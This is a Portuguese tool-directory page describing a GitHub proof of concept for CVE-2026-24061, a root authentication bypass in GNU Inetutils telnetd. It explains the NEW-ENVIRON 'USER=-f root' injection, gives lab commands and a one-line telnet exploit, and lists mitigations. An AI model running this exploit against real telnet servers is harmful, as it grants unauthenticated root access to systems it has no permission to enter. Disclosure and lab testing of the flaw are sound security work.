Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-24061 — GNU Inetutils telnetd Bypass de Autenticação Remota | Kitploit
Ferramentas/GitHubGitHub/midox008/cve-2026-24061
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubmidox008/cve-2026-24061

CVE-2026-24061

GNU Inetutils telnetd Bypass de Autenticação Remota

Ver Repositório
54há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-24061

Bypass de Autenticação Remota no telnetd do GNU Inetutils

Sério, telnet em 2026? Qual é, pessoal, está na hora de evoluir. O SSH existe desde 1995. 🤦

Descrição

Uma vulnerabilidade crítica de bypass de autenticação no telnetd do GNU Inetutils que afeta as versões 1.9.3 a 2.7.

A vulnerabilidade explora a opção telnet NEW-ENVIRON para injetar argumentos maliciosos no login(1). Ao definir USER=-f root via protocolo telnet, um atacante pode contornar a autenticação e obter um shell root sem credenciais.

Versões Afetadas

  • GNU Inetutils 1.9.3 - 2.7

Detalhes Técnicos

O protocolo telnet suporta a opção NEW-ENVIRON (RFC 1572) que permite ao cliente enviar variáveis de ambiente para o servidor. O daemon telnetd passa a variável USER para o como argumento.

login(1)

Ao enviar USER=-f root, o valor é interpretado como:

  • Flag -f: Ignorar autenticação (host confiável)
  • root: Usuário alvo

Isso faz com que login -f root seja executado, concedendo acesso root imediato.

O PoC detecta a exploração bem-sucedida verificando IAC WILL ECHO (0xff 0xfb 0x01) — o sinal de protocolo que o servidor envia quando o acesso ao shell é concedido.

Configuração do Laboratório

root@kitploit:~
# Compilar e executar o contêiner telnetd vulnerável
docker compose up --build -d

# Testar o exploit
go run poc.go 127.0.0.1 2323

Exploração

root@kitploit:~
# Usando o PoC em Go (com shell interativo)
go run poc.go <alvo> <porta>

# PoC simples usando o cliente telnet padrão
env USER='-f root' telnet -a <alvo> <porta>

Mitigação

  • Pare de usar telnet em 2026, sério 🙏
  • Use SSH em vez disso (já existe há 31 anos, eu nem tinha nascido em '95 lol)
  • Atualize para uma versão corrigida do GNU Inetutils
  • Restrinja o acesso telnet por meio de regras de firewall

Arquivos

  • poc.go - Exploit em Go com shell interativo
  • Dockerfile - Contêiner telnetd vulnerável
  • docker-compose.yml - Orquestração do laboratório

Referências

  • Aviso: https://www.openwall.com/lists/oss-security/2026/01/20/2
  • GNU Inetutils: https://www.gnu.org/software/inetutils/
  • RFC 1572 (NEW-ENVIRON): https://tools.ietf.org/html/rfc1572

Créditos

  • LeakIX Research Team
Baixar ferramenta